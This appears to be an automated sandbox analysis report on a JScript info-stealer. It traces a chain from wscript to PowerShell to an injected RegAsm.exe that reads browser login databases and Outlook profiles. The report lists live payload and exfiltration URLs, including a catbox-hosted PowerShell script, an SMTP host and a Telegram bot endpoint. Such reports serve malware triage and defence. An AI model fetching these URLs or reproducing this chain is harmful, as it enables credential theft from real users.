Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\x.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.4564aa0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.4536e58.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.454dc80.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.4564aa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.454dc80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.4536e58.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: x.exe PID: 7660, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 7704, type: MEMORYSTR
Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.4564aa0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.4536e58.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.454dc80.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.4564aa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.454dc80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.4536e58.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: x.exe PID: 7660, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 7704, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.4564aa0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.4536e58.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.454dc80.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.4564aa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.454dc80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.4536e58.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: x.exe PID: 7660, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 7704, type: MEMORYSTR

                Remote Access Functionality

Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.4564aa0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.4536e58.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.454dc80.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.4564aa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.454dc80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.4536e58.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: x.exe PID: 7660, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 7704, type: MEMORYSTR
Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.4564aa0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.4536e58.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.454dc80.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.4564aa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.454dc80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.x.exe.4536e58.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: x.exe PID: 7660, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 7704, type: MEMORYSTR

MITRE ATT&CK Matrix (listed per tactic; a technique preceded by a number is one the analysis matched, the number being the count of matching signatures; the remaining entries are the unmatched default cells of the matrix)

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
Resource Development: 21 Scripting, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: 1 Exploitation for Client Execution, 2 PowerShell, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
Persistence: 21 Scripting, 1 DLL Side-Loading, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading, 411 Process Injection, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Defense Evasion: 1 Disable or Modify Tools, 3 Obfuscated Files or Information, 12 Software Packing, 1 Timestomp, 1 DLL Side-Loading, 1 Masquerading, 31 Virtualization/Sandbox Evasion, 411 Process Injection
Credential Access: 1 OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery: 1 File and Directory Discovery, 13 System Information Discovery, 1 Security Software Discovery, 1 Process Discovery, 31 Virtualization/Sandbox Evasion, 1 Application Window Discovery, 1 System Network Configuration Discovery, System Owner/User Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
Collection: 1 Archive Collected Data, 1 Data from Local System, 1 Email Collection, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
Command and Control: 1 Ingress Tool Transfer, 11 Encrypted Channel, 1 Non-Standard Port, 2 Non-Application Layer Protocol, 23 Application Layer Protocol, Multiband Communication, Commonly Used Port, Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
Behavior Graph

Behavior Graph ID: 1586897 | Sample: 1C24TDP_000000029.jse | Start date: 09/01/2025 | Architecture: WINDOWS | Score: 100

Start node: DNS/IP: reallyfreegeoip.org; mail24430.maychuemail.com; 4 other IPs or domains | Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures | Starts: wscript.exe
reallyfreegeoip.org: Signature: Tries to detect the country of the analysis system (by using the IP)
wscript.exe: DNS/IP: files.catbox.moe 108.181.20.35, 443, 49730, ASN852CA Canada | Dropped: C:\Temp\dddddd.ps1, ASCII | Signatures: System process connects to network (likely due to code injection or exploit); Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found | Starts: powershell.exe
powershell.exe: Dropped: C:\Users\user\AppData\Local\Temp\x.exe, PE32 | Signatures: Suspicious execution chain found; Found suspicious powershell code related to unpacking or dynamic code loading; Powershell drops PE file | Starts: x.exe; conhost.exe
x.exe: Signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file; Writes to foreign memory regions; 2 other signatures | Starts: RegAsm.exe; RegAsm.exe
RegAsm.exe: DNS/IP: mail24430.maychuemail.com 123.30.244.30, 49736, 587, VNPT-AS-VNVietnamPostsandTelecommunicationsVNPTVN Viet Nam; checkip.dyndns.com 132.226.247.73, 49731, 80, UTMEMUS United States; reallyfreegeoip.org 104.21.96.1, 49732, 443, CLOUDFLARENETUS United States | Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)

Initial Sample
Source | Detection | Scanner | Label | Link
1C24TDP_000000029.jse | 13% | ReversingLabs | |

Dropped Files
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\x.exe | 100% | Avira | TR/Dropper.Gen |
C:\Users\user\AppData\Local\Temp\x.exe | 100% | Joe Sandbox ML | |

Unpacked PE Files
No Antivirus matches

Domains
No Antivirus matches

URLs
Source | Detection | Scanner | Label | Link
http://ocsp.sectigo.com0- | 0% | Avira URL Cloud | safe |
http://mail24430.maychuemail.comd | 0% | Avira URL Cloud | safe |
https://files.catbox.moe; | 0% | Avira URL Cloud | safe |
http://mail.phobinh.com.vn | 0% | Avira URL Cloud | safe |
http://mail24430.maychuemail.com | 0% | Avira URL Cloud | safe |
http://mail.phobinh.com.vnd | 0% | Avira URL Cloud | safe |
Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
files.catbox.moe | 108.181.20.35 | true | false | | high
mail24430.maychuemail.com | 123.30.244.30 | true | true | | unknown
reallyfreegeoip.org | 104.21.96.1 | true | false | | high
checkip.dyndns.com | 132.226.247.73 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high
mail.phobinh.com.vn | unknown | unknown | true | | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
https://files.catbox.moe/jqxrkk.ps1 | false | | high
http://checkip.dyndns.org/ | false | | high
URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0# | RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2960829477.0000000006280000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2961090664.00000000062BB000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.1825590684.000001DCB77F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1799980815.000001DCA908A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1825590684.000001DCB7590000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000001.00000002.1799980815.000001DCA8CEB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://sectigo.com/CPS0 | RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2960829477.0000000006280000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2961090664.00000000062BB000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ocsp.sectigo.com0- | RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2960829477.0000000006280000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2961090664.00000000062BB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.1799980815.000001DCA9030000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1799466056.000001DCA7449000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.1799980815.000001DCA9030000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1799466056.000001DCA7449000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://reallyfreegeoip.orgd | RegAsm.exe, 00000005.00000002.2956937742.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000001.00000002.1825590684.000001DCB7590000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000001.00000002.1825590684.000001DCB7590000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org | RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2956937742.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://files.catbox.moe/ | wscript.exe, 00000000.00000002.1839683434.000001E2133EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1836905195.000001E2133EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728680537.000001E21344E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://mail.phobinh.com.vn | RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.1799980815.000001DCA9030000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1799466056.000001DCA7449000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://files.catbox.moe/u | wscript.exe, 00000000.00000002.1839683434.000001E2133EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1836905195.000001E2133EA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://files.catbox.moe; | wscript.exe, 00000000.00000003.1836905195.000001E2133EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728680537.000001E21344E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728680537.000001E21341F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728564793.000001E21341B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1836134689.000001E212C55000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://files.catbox.moe/jqxrkk.ps1u | wscript.exe, 00000000.00000003.1712270321.000001E212B50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1839074641.000001E212B4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1712341931.000001E212B50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1835122772.000001E212B4E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189l | RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.comd | RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://files.catbox.moe/9 | wscript.exe, 00000000.00000003.1728680537.000001E21344E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org/q | x.exe, 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://mail24430.maychuemail.com | RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000001.00000002.1825590684.000001DCB7590000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1825590684.000001DCB77F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1799980815.000001DCA908A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1825590684.000001DCB7590000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189d | RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://reallyfreegeoip.org | RegAsm.exe, 00000005.00000002.2956937742.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://oneget.orgX | powershell.exe, 00000001.00000002.1799980815.000001DCA8CEB000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.orgd | RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org | RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://mail24430.maychuemail.comd | RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://mail.phobinh.com.vnd | RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000001.00000002.1799980815.000001DCA7511000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://files.catbox.moe | wscript.exe, 00000000.00000003.1836905195.000001E2133EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728680537.000001E21344E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728680537.000001E21341F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728564793.000001E21341B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1836134689.000001E212C55000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.com | RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org/d | RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.1799980815.000001DCA7511000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2956937742.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot-/sendDocument?chat_id= | x.exe, 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://oneget.org | powershell.exe, 00000001.00000002.1799980815.000001DCA8CEB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/ | x.exe, 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmp | false | | high
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
108.181.20.35 | files.catbox.moe | Canada | 852 | ASN852CA | false
104.21.96.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
123.30.244.30 | mail24430.maychuemail.com | Viet Nam | 7643 | VNPT-AS-VNVietnamPostsandTelecommunicationsVNPTVN | true
132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1586897
Start date and time: 2025-01-09 18:32:13 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 47s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (Javascript)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 1C24TDP_000000029.jse
Detection: MAL
Classification: mal100.spre.troj.spyw.expl.evad.winJSE@10/7@4/4
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 31
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .jse
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 52.149.20.212, 4.245.163.56, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7500 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: 1C24TDP_000000029.jse
Time | Type | Description
12:33:16 | API Interceptor | 5x Sleep call for process: powershell.exe modified
12:33:25 | API Interceptor | 81x Sleep call for process: RegAsm.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
108.181.20.35 | Document.pdf.lnk | Get hash | malicious | Unknown | Browse | files.catbox.moe/p1yr9i.pdf
108.181.20.35 | SecuriteInfo.com.HEUR.Trojan.OLE2.Agent.gen.26943.12401.msi | Get hash | malicious | LummaC Stealer | Browse | files.catbox.moe/nzct1p
104.21.96.1 | QUOTATION#070125-ELITE MARINE .exe | Get hash | malicious | FormBook | Browse | www.mzkd6gp5.top/3u0p/
104.21.96.1 | SH8ZyOWNi2.exe | Get hash | malicious | CMSBrute | Browse | pelisplus.so/administrator/index.php
104.21.96.1 | Recibos.exe | Get hash | malicious | FormBook | Browse | www.mffnow.info/1a34/

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
reallyfreegeoip.org | Tepe - 20000000826476479.exe | Get hash | malicious | MassLogger RAT | Browse | 104.21.16.1
reallyfreegeoip.org | Order_List.scr.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse | 104.21.64.1
reallyfreegeoip.org | Nuevo pedido.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.16.1
reallyfreegeoip.org | CTM REQUEST-ETD JAN 22, 2024_pdf.exe | Get hash | malicious | MassLogger RAT | Browse | 104.21.96.1
reallyfreegeoip.org | Copy shipping docs PO EV1786 LY ECO PAK EV1.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | 104.21.80.1
reallyfreegeoip.org | Payment 01.08.25.pdf.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | 104.21.96.1
reallyfreegeoip.org | December Reconciliation QuanKang.exe | Get hash | malicious | Unknown | Browse | 104.21.48.1
reallyfreegeoip.org | JB#40044 Order.exe | Get hash | malicious | MassLogger RAT | Browse | 104.21.112.1
reallyfreegeoip.org | PO.exe | Get hash | malicious | MassLogger RAT | Browse | 104.21.112.1
reallyfreegeoip.org | BgroUcYHpy.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 188.114.96.3
checkip.dyndns.com | Tepe - 20000000826476479.exe | Get hash | malicious | MassLogger RAT | Browse | 193.122.130.0
checkip.dyndns.com | Order_List.scr.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse | 132.226.8.169
checkip.dyndns.com | Nuevo pedido.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 193.122.130.0
checkip.dyndns.com | fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe | Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | 132.226.8.169
checkip.dyndns.com | CTM REQUEST-ETD JAN 22, 2024_pdf.exe | Get hash | malicious | MassLogger RAT | Browse | 132.226.8.169
checkip.dyndns.com | Copy shipping docs PO EV1786 LY ECO PAK EV1.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | 132.226.247.73
checkip.dyndns.com | Payment 01.08.25.pdf.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | 193.122.6.168
checkip.dyndns.com | December Reconciliation QuanKang.exe | Get hash | malicious | Unknown | Browse | 193.122.6.168
